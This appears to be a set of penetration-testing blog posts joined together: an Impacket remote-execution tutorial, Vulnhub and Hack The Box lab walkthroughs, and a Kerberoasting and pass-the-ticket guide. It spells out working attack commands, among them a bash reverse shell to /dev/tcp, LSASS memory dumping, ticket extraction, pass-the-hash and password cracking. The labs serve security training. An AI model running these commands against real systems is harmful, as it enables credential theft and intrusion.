Remote Code Execution Using Impacket

In this post, we are going to discuss how we can connect to Victims machine remotely using Python libraries “Impacket” which you can download from here.

Table of Content

About Impacket
atexec.py
psexec.py
smbexec.py
wmiexec.py

About Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.

Packets can be constructed from scratch, as well as parsed from raw data, and the object-oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

Atexec.py

Atexec.py: Impacket has a python library that helps an attacker to access the victim host machine remotely through DCE/RPC based protocol used by CIFS hosts to access/control the AT-Scheduler Service and execute the arbitrary system command.

Syntax: Python atexec.py domain/username:[email protected] command

python atexec.py ignite/administrator:Ignite@987@192.168.1.105 systeminfo

1	python atexec.py ignite/administrator:Ignite@987@192.168.1.105 systeminfo

As you can see we have obtained the system information with the help of the above command.

PsExec.py

PSEXEC like functionality example using RemComSvc, with the help of python script we can use this module for connecting host machine remotely thus you need to execute following command.

Syntax: Python psexec.py domain/username:[email protected]

python psexec.py ignite/administrator:Ignite@987@192.168.1.105

1	python psexec.py ignite/administrator:Ignite@987@192.168.1.105

As you can see we have obtained the system shell with the help of the above command.

Smbexec.py

Smbexec.py uses a similar approach to psexec w/o using RemComSvc. This script works in two ways:

share mode: you specify a share, and everything is done through that share.
server mode: if for any reason there’s no share available, this script will launch a local SMB server, so the output of the commands executed is sent back by the target machine into a locally shared folder. Keep in mind you would need root access to bind to port 445 in the local machine.

Syntax: Python smbexec.py domain/username:[email protected]

python smbexec.py ignite/administrator:Ignite@987@192.168.1.105

1	python smbexec.py ignite/administrator:Ignite@987@192.168.1.105

As you can see we have obtained the system shell with the help of the above command.

wmiexec.py

A similar approach to smbexec but executing commands through WMI. The main advantage here is it runs under the user (has to be Admin) account, not SYSTEM, plus, it doesn’t generate noisy messages in the event log that smbexec.py does when creating a service. The drawback is it needs DCOM, hence, I have to be able to access DCOM ports at the target machine.

Syntax: Python wmiexec.py domain/username:[email protected]

python wmiexec.py ignite/administrator:Ignite@987@192.168.1.105 dir

1	python wmiexec.py ignite/administrator:Ignite@987@192.168.1.105 dir

As you can see we have obtained the system information with the help of the above command.

HA: Pandavas Vulnhub Walkthrough

Today we’re going to solve another boot2root challenge called “Pandavas”. It’s available at Vulnhub for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to Hacking Articles. Let’s get started and learn how to break it down successfully.

Level: Not defined

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

Netdiscover
Nmap

Enumeration

Snmpwalk
Dirb
CeWL
Bruteforce with Metasploit
LinEnum

Exploiting

SSH login
Dockers Services
mysqldump

Privilege Escalation

Abusing SUDO
Capture the flag

Walkthrough

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

So, let’s start by listing all the TCP ports with nmap.

nmap -sV -p- 192.168.10.162

1	nmap -sV -p- 192.168.10.162

Then, we will do a second scan but pay attention, we will add to the command “-sU” to get the UDP services.

This second check for UDP services will take longer, so while nmap is finishing, we will take the opportunity to check the TCP services found.

Enumeration

We start by visiting the web service (port 80), we find several pictures and information about the Pandavas, we check the source code and robots.txt, it seems that there is nothing useful. (or at least, for the moment)

With the help of Dirb, we will use a big dictionary of words and a short one with more known extensions and we will find a file called “hidden.docx“

We downloaded the “hidden.docx” file:

We open the document, it gives us more details of the history of the “Pandavas”, below we see a clue that will lead us to the first flag.

We copy the text and paste it in nano or another text editor, there the flag will appear by magic.

Now, in the enumeration of UDP services, we detect an SNMP service (port 161), this service is usually misconfigured with a “public” channel where it usually shows confidential information of services and other applications of an organization.

For this we will use the tool “snmpwalk” and there we will find the second flag and a user name of the machine.

snmpwalk -v1 -c public 192.168.10.162 |more

1	snmpwalk -v1 -c public 192.168.10.162 \|more

Exploiting

We already have a user, but we are missing the password, I tried a dictionary with the 1000 most used passwords, but our friends from “Hacking Articles” were not going to make it easy for us. So I had to create a custom dictionary using the web service page (remember, port 80).

Once our dictionary is created, we use the “SSH LOGIN” module from Metasploit, we configure it with the user “karna” and with our custom dictionary.

Perfect! So now we connect via SSH and start exploring the inside of the machine.

Once inside, we can list the other two users, we check files and binaries that we have permissions, but it doesn’t work for us.

So we launch another credential listing with the Metasploit bruteforce specifying the user “krishna”.

Great! We authenticate with the user “krishna“:

With this user, we have sudo access to everything, so we could run a reverse shell as sudo, get root privileges, read the root flag and game over… But we’d still be two flags short of completing the challenge!

We listed the machine’s interfaces and found that there is a docker presence in at least three services.

Now we’ll list the docker processes that are running on the machine and we’ll list an FTP service and a MySQL that seem quite interesting.

Start with the FTP service connect:

Go to the “root” folder, find a file called “.ash_history“, read it and get a flag and credentials encoded in Base64.

Decode the string in base64 and get a password.

We will now connect to Docker’s MySQL service:

We’ll break into the database with the credentials “root” and the password “[email protected]“. We will help ourselves with the following command:

mysqldump -A –u root –password=ignite@123 |grep flag

1	mysqldump -A –u root –password=ignite@123 \|grep flag

Perfect, we already have the four flags, now we just need to climb privileges as “root” user and read the flag.

Privilege Escalation

There are many ways to get root, I put a terminal with netcat listening on port 4444 and used the following command to raise in my kali a reverse shell as root:

In our kali:

nc -nvlp 4444

1	nc -nvlp 4444

On the victim machine:

sudo -u root bash -i >& /dev/tcp/192.168.10.161/4444 0>&1

1	sudo -u root bash -i >& /dev/tcp/192.168.10.161/4444 0>&1

Now we execute the command in the victim machine and we get a shell as root in our kali.

And now yes, we read our beloved root flag and get the fifth and final flag:

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contacted on LinkedIn.

Kerberoasting and Pass the Ticket Attack Using Linux

In our previous post, we explained the Kerberoasting attack in detail, which you can read from here. I recommend, then, to revisit our previous article for better understanding before implementing the attack mentioned in this section.

In this post, we will discuss how to perform a kerberoasting attack and remotely pass the Kerberos ticket using Kali Linux. Kerberoasting is considered to be lateral movement, so once you have penetrated the domain client system and obtained the computer shell, then use the following method for abusing Kerberos.

Table of Content

Pass the ticket

kirbi2ccache
py

Kerberoasting

Kirbi2john

Pass the Ticket: kirbi2ccache

In order to abuse Kerberos against pass the ticket or kerberoasting attack, we need to import DMP file in our local machine (Kali Linux) through Client machine and to do this execute the following command through meterpreter session.

load powershell
powershell_shell
Get-Process Lsass
cd C:\Windows\System32
.\rundll32.exe comsvcs.dll, MiniDump 628 C:\lsass.DMP full

load powershell

powershell_shell

Get-Process Lsass

cd C:\Windows\System32

.\rundll32.exe comsvcs.dll, MiniDump 628 C:\lsass.DMP full

Why we need Lsass.DMP file?

Because of LSASS.DMP stores the TGT & TGS ticket in the kirbi format for some period of time and using this DMP file we can obtain the following:

NTLM HASH of User
KRB5_TGT ticket
KRB5_TGS ticket
NTLM HASH for Service

Once you have dumped the lsass.dmp, download it on your local machine for extracting kirbi files.

download lsass.DMP /root/Desktop/

1	download lsass.DMP /root/Desktop/

Download and install pypykatz for extracting stored Kerberos tickets in Kirbi format from inside the lsass.DMP file by executing the following commands

mkdir /root/kerb
pypykatz lsa -k /root/kerb minidump /root/Desktop/lsass.DMP

1 2	mkdir /root/kerb pypykatz lsa -k /root/kerb minidump /root/Desktop/lsass.DMP

As you can observe we have obtained all Kerberos ticket in kirbi format as well as the NTLM HASH for user Yashika.

Currently, we have enumerated the KRB5_TGT ticket authorized for user “Yashika”. Let try to pass the ticket to get TGS and access the requested services.

Kirbi2ccache is a python script that falls under the Impacket library, transforming the kirbi format file into ccache and then using Export KRB5CCCNAME to inject the ccache file into DC to get access to the requesting service.

kirbi2ccache TGT_IGNITE.LOCAL_yashika_krbtgt_IGNITE.LOCAL_6d469878.kirbi yashika.ccache
export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

1 2	kirbi2ccache TGT_IGNITE.LOCAL_yashika_krbtgt_IGNITE.LOCAL_6d469878.kirbi yashika.ccache export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

Impacket GetTGT.py

Likewise, this can also be accomplished with the help of getTGT.py, as it will request a TGT and save it as ccache by giving a password, hash or aesKey.

If you recall that for user Yashika we have extracted the NTLM HASH. Now we have used the following command to request a TGT from DC and save it in CCache format. Laterally we can inject the ccache file into DC with the help of Export KRB5CCNAME to get access to the requesting service.

python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika
export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

1 2	python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

Kerberosasting: kirbi2john

As we said with the help of stored KRB5_TGS, we can extract the NTLM hashes for Service Server and try to crack the hash in order to get the password in clear text or use this hash to pass the hash attack. This would be known as kerberoasting.

Now as you can see in the highlight image we’ve outlined the KRB5_TGS for SQL Server in kirbi format and converted it to john crackable format with the help of kirbi2john.py (possible at /usr/ share/john/) called “TGS hash;” then use john for brute force password.

/usr/share/john/kirbi2john.py <KRB5_TGS kirbi>  > <Output file name>
john --wordlist=/usr/share/wordlists/rockyou.txt TGS_hash

1 2	/usr/share/john/kirbi2john.py <KRB5_TGS kirbi> > <Output file name> john --wordlist=/usr/share/wordlists/rockyou.txt TGS_hash

Booom!!!! We found the password for SQL service server.

Hack the Box: Monteverde Walkthrough

Today we’re going to solve Hack The Box’s “Monteverde” machine. This lab is of “medium” level, although you will see that it is quite simple.

Level: Medium

Penetration Testing Methodology

Reconnaissance

Nmap

Enumeration

Enum4Linux
Bruteforce SMB Login (Metasploit)
Smbclient

Exploiting

Evil-winrm
Powershell Scripts

Privilege Escalation

Abuse of Azure’s group privileges
Capture the flag

Walkthrough

Reconnaissance

We start with a scan of the 5,000 main ports:

nmap -sV --top-ports 5000 10.10.10.172

1	nmap -sV --top-ports 5000 10.10.10.172

Enumeration

After checking each of the services, it is time to obtain as much information as possible from the Samba service (port 445) with the help of the “Enum4linux” tool.

We list the domain name:

And the list of users that belong to the corporation:

Exploiting

We create a file “users.txt” and introduce the different users found in the previous phase.

Now and with the “smb_login” module of Metasploit, we make a brute force, we will indicate the same file “users.txt” for the option “user_file” and “pass_file“. Disable the “verbose” mode so that only positive results appear.

We’ll get a match, so we already have some credentials to be able to gossip in the organization’s files.

We use the credentials and see that we have several areas to check.

I’ll save you time and we’ll access the “users$” resource.

Privilege Escalation (user)

We access the user’s folder “mhope” and find a file called “azure.xml“. Of course, my friend! We downloaded it!

We execute the command “cat” on the file “azure.xml” and find some access credentials for the user “mhope“.

We use these credentials to connect by RDP (Remote Desktop Protocol) service with the help of “Evil-winrm” and we will read the “user.txt” flag.

Privilege Escalation (administrator)

We execute the command “whoami /all” to obtain all the information of our committed user.

We found in the information that we belong to the group of administrators of Azure.

Now, we will leave the “Evil-winrm” session and download the following script in Powershell called “Azure-ADConnect.ps1“.

And we’ll connect again with “Evil-winrm“, but this time, we’ll specify a new command to indicate the path where the “Azure-ADConnect” file is located.

The following commands will make the script load in Powershell in our Evil-winrm, the second command will make it synchronize with the Active Directory located in Azure and will return us the administrator credentials.

Once we have obtained the administrator credentials, we will connect to them again and read the “root.txt” flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn.